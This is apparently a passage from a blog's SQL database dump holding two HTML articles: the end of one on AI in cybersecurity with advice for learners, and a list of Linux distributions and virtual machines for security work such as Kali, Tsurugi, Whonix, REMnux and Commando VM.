[&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Future Trends and Innovations in AI for Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The field of AI in cybersecurity is constantly evolving. As cyber threats grow more sophisticated, AI is expected to keep pace through innovations such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Self-Learning Systems</strong></b>: AI systems will soon be able to continually learn and adapt to changing threats without manual input.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">AI Collaboration Networks</strong></b>: Organizations may share AI-driven threat intelligence across industries for faster, global cyber defense.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Biometrics and Behavioral AI</strong></b>: Enhanced use of biometrics and behavioral patterns for user authentication will boost security in personal and enterprise systems alike.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">AI-Powered Cloud Security</strong></b>: With more businesses moving to the cloud, AI tools will play a vital role in securing cloud-based applications and storage.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommendations for IT Professionals and Cybersecurity Learners</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you are new to cybersecurity or an experienced professional, here are some recommendations to make the most of AI-powered approaches:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Learn the Basics</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Start by understanding the fundamental concepts of AI and how they integrate into cybersecurity systems. Taking online courses or certifications in machine learning and cybersecurity can provide a solid foundation.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Stay Updated</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity landscape evolves constantly. Subscribe to industry blogs, attend webinars, or follow leading AI and cybersecurity firms to stay informed about the latest trends.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Experiment with Tools</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Familiarize yourself with AI-driven cybersecurity tools like SentinelOne, Darktrace, and Palo Alto Networks\' Prisma. Experimenting with these tools can enhance your practical understanding.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Collaborate and Network</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Engage with the cybersecurity community on LinkedIn, GitHub, or forums. Collaboration often leads to valuable insights and access to resources.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Get Hands-On Experience</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Pursue internships or projects that integrate AI and cybersecurity. Real-world exposure is invaluable and can set you apart in this dynamic field.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">AI is no longer just a buzzword in cybersecurity—it’s the current and future standard. By empowering organizations with faster, smarter, and more proactive threat detection, AI is reshaping the way we approach online security. For professionals and learners in the field, understanding and leveraging AI is becoming an essential skill.</p>', '', NULL, NULL, 1, 'draft', '2025-01-26 00:22:57', '2026-01-12 21:41:44', 'Information Security', 'How Can AI Transform Cybersecurity? Use Cases and Insights', '', NULL),
(58, 'Top Linux Distributions and Virtual Machines for Cybersecurity Professionals', 'top-linux-distributions-and-virtual-machines-for-cybersecurity-professionals', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is a rapidly evolving field that requires a specialized set of tools and environments to perform tasks like penetration testing, threat analysis, incident response, and secure communication. Luckily, there is a variety of Linux distributions and virtual machines specifically crafted to meet these needs. Whether you’re an ethical hacker, forensic analyst, or threat intelligence professional, there\'s a solution to enhance your workflow. Below, we explore key operating systems and virtual machines, listing their unique features and official websites.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Kali Linux</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.kali.org/\">https://www.kali.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Known as the industry-standard platform for penetration testers, Kali Linux comes pre-loaded with hundreds of tools for ethical hacking, vulnerability assessment, and penetration testing. Its derivative, <b><strong class=\"font-bold\">Kali Purple</strong></b>, extends capabilities into the defensive side of security by including tools for both attack and defense, making it an all-in-one solution for cybersecurity experts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Pre-installed hacking tools like Metasploit, Nmap, and Wireshark.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Community-driven updates for cutting-edge features.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Lightweight and customizable for advanced configurations.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Tsurugi Linux</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://tsurugi-linux.org/\">https://tsurugi-linux.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tsurugi Linux is designed for <b><strong class=\"font-bold\">digital forensics and incident response (DFIR)</strong></b> workflows. It includes specialized tools for analyzing malware, memory forensics, and disk imaging. Powerful and investigator-friendly, this distribution is critical for law enforcement and corporate investigations.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tailored for malware and memory analysis.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Comprehensive forensic utilities for investigators.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Great for incident response planning and execution.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Predator OS</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://predator-os.com/\">https://predator-os.com/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Privacy-conscious cybersecurity professionals often turn to Predator OS, a distribution that prioritizes anonymity and ethical hacking. It combines security-focused features with tools necessary for penetration testing and vulnerability assessments.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Enhanced privacy for anonymous operations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">A user-friendly alternative for security professionals.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">BlackArch Linux</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://blackarch.org/\">https://blackarch.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">BlackArch is based on Arch Linux and offers a repository of over 2,000 tools for ethical hacking, making it ideal for advanced researchers and penetration testers. It\'s lightweight, scalable, and perfect for professionals who want maximum customization.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Huge repository of security-testing tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Designed for experienced users working on complex cybersecurity challenges.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Whonix</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.whonix.org/\">https://www.whonix.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whonix ensures <b><strong class=\"font-bold\">anonymity</strong></b> by routing all communications through Tor. Built on Debian, it separates workstations and gateways for added security, making it an exceptional choice for privacy-focused professionals.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Robust anonymity with Tor routing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Secure separation between workstations and gateways.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Tails (The Amnesic Incognito Live System)</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://tails.boum.org/\">https://tails.boum.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A live operating system crafted for absolute privacy, Tails leaves no trace behind after use. It is commonly used for secure browsing and communications, especially for those who value discreet cyber activities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">No persistent data storage for maximum security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Portable and easy to run as a live OS.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. <b><strong class=\"font-bold\">RedHunt OS</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://redhunt.os.com/\">https://redhunt.os.com/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">RedHunt OS combines tools for both defense and offense, making it ideal for adversary simulation and threat hunting. It takes a balanced approach to cybersecurity, catering to professionals who need capabilities for attack as well as protection.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tools for adversary simulation and threat defense.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Comprehensive hybrid solution for varied security workflows.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. <b><strong class=\"font-bold\">Threat Pursuit VM</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://github.com/fireeye/ThreatPursuit-VM\">https://github.com/fireeye/ThreatPursuit-VM</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Built specifically for threat intelligence professionals, this Windows-based virtual machine offers a range of tools for research, malware analysis, and threat investigation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tailored for malware and threat intelligence research.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Ideal for Windows-based work environments.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">9. <b><strong class=\"font-bold\">SIFT Workstation</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://digital-forensics.sans.org/community/downloads\">https://digital-forensics.sans.org/community/downloads</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The <b><strong class=\"font-bold\">SANS Investigative Forensics Toolkit (SIFT)</strong></b> is a virtual machine tailored for forensic analysts. It provides pre-configured tools for analyzing file systems and memory data, making investigations seamless and efficient.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Comprehensive forensic toolkit.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Developed by SANS Institute experts.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10. <b><strong class=\"font-bold\">REMnux</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://remnux.org/\">https://remnux.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">REMnux focuses on reverse engineering malware, offering tools for analyzing malicious files and understanding complex threats. It\'s an essential resource for incident response teams.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Specialized for malware reverse engineering.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Lightweight and easy to use for targeted investigations.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">11. <b><strong class=\"font-bold\">Flare VM</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://github.com/fireeye/flare-vm\">https://github.com/fireeye/flare-vm</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Designed for use on Windows, Flare VM offers an extensive suite of tools for reverse engineering and malware analysis, making it perfect for deep investigations on enterprise networks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tools for threat analysis and reverse engineering.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Windows-centric for specialized use cases.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">12. <b><strong class=\"font-bold\">Commando VM</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://github.com/fireeye/commando-vm\">https://github.com/fireeye/commando-vm</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This virtual machine serves as an offensive security toolkit for advanced penetration testers and red teams. Developed by Mandiant, it emphasizes post-exploitation capabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Advanced red-teaming tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Comprehensive for offensive security workflows.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">13. <b><strong class=\"font-bold\">Parrot OS</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.parrotsec.org/\">https://www.parrotsec.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Parrot OS is a lightweight, privacy-focused alternative to Kali Linux. With tools for penetration testing and secure corporate use, it offers excellent versatility for professionals working in varied roles.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Balanced features for hacking and privacy.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Lightweight yet resourceful alternative.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Final Thoughts</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Every Linux distribution or virtual machine listed above serves a unique purpose in cybersecurity. Whether it’s penetration testing, incident response, malware analysis, or anonymity, there is a tailored solution for your specific needs.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Explore these platforms to enhance your cybersecurity capabilities, boost productivity, and stay ahead in this dynamic field.</p>', '', NULL, NULL, 1, 